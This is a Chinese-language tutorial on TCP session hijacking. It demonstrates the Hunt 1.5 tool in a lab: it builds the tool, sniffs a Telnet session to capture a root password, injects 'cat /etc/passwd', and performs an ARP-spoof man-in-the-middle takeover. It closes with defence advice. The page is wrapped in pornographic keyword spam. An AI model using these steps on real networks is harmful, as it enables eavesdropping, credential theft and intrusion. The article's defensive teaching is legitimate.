成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

會話劫持實例演示與防范技巧

安全 黑客攻防
本文通過使用會話劫持工具Hunt1.5進(jìn)行一次會話劫持實例演示,通過本次展示希望大家可以深入地了解會話劫持的攻擊過程以便對其進(jìn)行防范。

要知道很多工具都可以進(jìn)行會話劫持,比如說相對常用的juggernaut、TTY Watcher,還有如Dsniff這樣的工具包也可以實現(xiàn)會話劫持。但是本此的會話劫持實例演示還是通過經(jīng)典工具Hunt來進(jìn)行。Hunt可以說是功能非常強(qiáng)大,并且可以把會話劫持技術(shù)發(fā)揮得淋漓盡致。

本次會話劫持實例演示所使用的Hunt是1.5,可以到Pavel Krauz網(wǎng)站下載源代碼包和二進(jìn)制文件:

lin.fsid.cvut.cz/~kra/#hunt。

現(xiàn)在來看看如果使用Hunt,首先是下載并編譯源代碼:

[root@dahubaobao hunt]#wget

[root@dahubaobao>www.ringz.org/hunt-1.5.tgz

[root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz

[root@dahubaobao hunt]#cd hunt-1.5

[root@dahubaobao hunt-1.5]#make

[root@dahubaobao hunt-1.5]#./hunt

//Hunt是完全交互試的操作

解釋一下各個選項的含義

l/w/r) list/watch/reset connections

//l(字母l)為查看當(dāng)前網(wǎng)絡(luò)上的會話;w為監(jiān)視當(dāng)前網(wǎng)絡(luò)上的某個會話;r為重置當(dāng)前網(wǎng)絡(luò)上的某個會話。

a) arp/simple hijack (avoids ack storm if arp used)

//中間人攻擊(會話劫持),Hunt先進(jìn)行ARP欺騙,然后進(jìn)行會話劫持。使用此方法可以避免出現(xiàn)ACK風(fēng)暴。

s) simple hijack

//簡單的會話劫持,也就是注射式攻擊。會出現(xiàn)ACK風(fēng)暴。

d) daemons rst/arp/sniff/mac

//該選項共實現(xiàn)四個功能,分別為:終止會話,自動發(fā)送帶RST標(biāo)志位的TCP包;ARP欺騙后進(jìn)行數(shù)據(jù)包轉(zhuǎn)發(fā);不用說了,嗅探功能;在當(dāng)前網(wǎng)絡(luò)上收集MAC地址。

其他的選項很簡單,不在多說了。還是來看看具體的例子吧,我想大家都等不及了!^_^

應(yīng)用實例

測試環(huán)境:

攻擊者:Red Hat Linux 9.0 IP:192.168.0.10

主機(jī)A:Windows Advanced Server IP:192.168.0.1

主機(jī)B:FreeBSD 4.9 STABLE IP:192.168.0.20

[root@dahubaobao hunt-1.5]#./hunt

/*

* hunt 1.5

* multipurpose connection intruder / sniffer for Linux

* (c) 1998-2000 by kra

*/

starting hunt

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*> l //查看當(dāng)前網(wǎng)絡(luò)上的會話

 0)192.168.0.1 [3465] ?192.168.0.20 [23]

//主機(jī)A正在Telnet到主機(jī)B

--- Main Menu --- rcvpkt 0, fr

ee/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*> w //監(jiān)視當(dāng)前網(wǎng)絡(luò)上的會話

0)192.168.0.1 [3465] ?192.168.0.20 [23]

Choose conn>0 //選擇打算監(jiān)視的會話。由于我的條件有限,不能模擬多個會話,請多見量。

Dump [s]rc/[d]st/[b]oth [b]> //回車

Print sec/dst same charactes y/n [n]> //回車 現(xiàn)在就可以監(jiān)視會話了。主機(jī)A輸入的一切內(nèi)容,我們都可以看到。主機(jī)A在Telnet并登陸之后,直接su root,password:后邊的就是root的密碼。現(xiàn)在這個系統(tǒng)已經(jīng)完全由你所控制了,自由發(fā)揮吧!

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*> s //進(jìn)行注射式會話劫持

0)192.168.0.1 [3465] ?192.168.0.20 [23]

choose conn> 0

dump connection y/n [n]>

Enter the command string you wish executed or [cr]> cat /etc/passwd#p#

攻擊者的意圖是獲取主機(jī)B的passwd文件的內(nèi)容,但由于注射式會話劫持缺陷,導(dǎo)致了ACK風(fēng)暴,所以Hunt向會話雙方發(fā)送了一個帶RST標(biāo)志位的TCP包來阻止ACK風(fēng)暴。

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

l/w/r) list/watch/reset connections

u) host up tests

a) arp/simple hijack (avoids ack storm if arp used)

s) simple hijack

d) daemons rst/arp/sniff/mac

o) options

x) exit

*> a //進(jìn)行中間人會話劫持

0)192.168.0.1 [3862] ?192.168.0.20 [23]

choose conn> 0

arp spoof src in dst y/n [y]>

src MAC [XX:XX:XX:XX:XX:XX]>

arp spoof dst in src y/n [y]>

dst MAC [XX:XX:XX:XX:XX:XX]>

input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>

dump connectin y/n [y]> n

press key to take voer of connection

ARP spoof of 192.168.0.20 with fake mac XX:XX:XX:XX:XX:XX in host 192.168.0.1 FA

ILED

do you want to force arp spoof nutil successed y/n [y]>

CTRL-C to break

CTRL+C //手工輸入CTRL+C中斷,不需等待

-- operation canceled - press any key>

ARP spoof failed

ARP spoof of 192.168.0.20 in host 192.168.0.1 FAILED

you took over the connection

CTRL-] to break

-bash-2.05b$id

....................

在這次會話劫持實例的演示中,攻擊者已經(jīng)成功的劫持了主機(jī)A和B之間的Telnet會話。主機(jī)A輸入的一切命令攻擊者都可以看到,并且攻擊者也可以自行插入命令。正如前邊所說的,這種會話劫持方式先進(jìn)行ARP欺騙,然后才劫持,所以,ACK風(fēng)暴是不會出現(xiàn)的;而且,這種方式要比注射式會話劫持危害更大,從上文中我想就能看出來,我就不必在多說什么了。還有一些如Sniffer等功能,都很簡單,由于已不在本文范疇,故不在多說。

會話劫持防范

防范會話劫持是一個比較大的工程。首先應(yīng)該使用交換式網(wǎng)絡(luò)替代共享式網(wǎng)絡(luò),雖然像Hunt這樣的工具可以在交換環(huán)境中實現(xiàn)會話劫持,但還是應(yīng)該使用交換式網(wǎng)絡(luò)替代共享式網(wǎng)絡(luò),因為這樣可以防范最基本的嗅探攻擊。然而,最根本的解決辦法是采用加密通訊,使用SSH代替Telnet、使用SSL代替HTTP,或者干脆使用IPSec/VPN,這樣會話劫持就無用武之地了。其次,監(jiān)視網(wǎng)絡(luò)流量,如發(fā)現(xiàn)網(wǎng)絡(luò)中出現(xiàn)大量的ACK包,則有可能已被進(jìn)行了會話劫持攻擊。

還有一點是比較重要的,就是防范ARP欺騙。
 

【編輯推薦】

  1. 黑客不愛軟件漏洞 更喜歡利用錯誤配置
  2. “90后”黑客攻擊南京房管局網(wǎng)站
  3. Black Hat和Defcon黑客大會的五大看點
  4. 路由器漏洞:黑客展示如何攻陷百萬臺
  5. 揭秘黑客手中DDoS攻擊利器——黑色能量2代
責(zé)任編輯:張啟峰 來源: 安全在線
相關(guān)推薦

2015-11-09 14:28:06

Adroid安全

2012-12-25 13:45:37

2010-09-09 22:31:43

2021-04-09 09:02:00

惡意軟件Android劫持會話

2009-08-18 13:30:01

C#安裝與部署

2011-05-10 09:26:45

BESBlackBerry

2015-11-09 14:37:45

Android安全

2022-05-26 16:44:12

MFA會話劫持

2010-09-09 20:26:34

2010-06-02 11:34:23

MySQL 數(shù)據(jù)庫導(dǎo)入

2015-05-07 09:16:46

2024-09-24 10:41:57

MyBatis編程

2010-06-04 10:40:55

AJAX MySQL

2009-08-13 18:26:35

C#繼承構(gòu)造函數(shù)

2009-07-17 17:16:48

Spring iBAT

2009-07-13 11:47:58

2010-12-17 10:04:40

Exchange SeLinux郵箱

2012-11-20 13:06:57

2011-03-11 10:10:52

2009-09-01 18:29:10

C#繼承C#多態(tài)
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 成人无遮挡毛片免费看 | 一级片网址 | 欧美一区二区三区久久精品 | 午夜精品久久久久久久久久久久久 | 91精品国产综合久久久久久丝袜 | 日本久久综合网 | 91成人在线| 国产成人影院 | 在线一区视频 | 精品一区二区三区免费视频 | 国产成人网 | 国产黄色小视频在线观看 | 久久青青 | 久久久片 | 久久精品国产a三级三级三级 | 都市激情亚洲 | 一区二区三区在线免费观看 | 亚洲视频 欧美视频 | 国产精品女人久久久 | 99视频在线免费观看 | 北条麻妃一区二区三区在线视频 | 福利精品 | 自拍偷拍第一页 | 欧美xxxx日本 | 国产在线高清 | 久久99精品久久久久久噜噜 | 久久网日本 | 在线国产一区 | 在线国产中文字幕 | 日日干干| 91精品国产日韩91久久久久久 | 青草久久免费视频 | 久久y| 精品国产欧美一区二区三区成人 | 欧美日韩久久 | 久草网免费 | 99国产在线| 精品国产高清一区二区三区 | 九九久久这里只有精品 | 日韩三级电影在线看 | 91av在线免费播放 |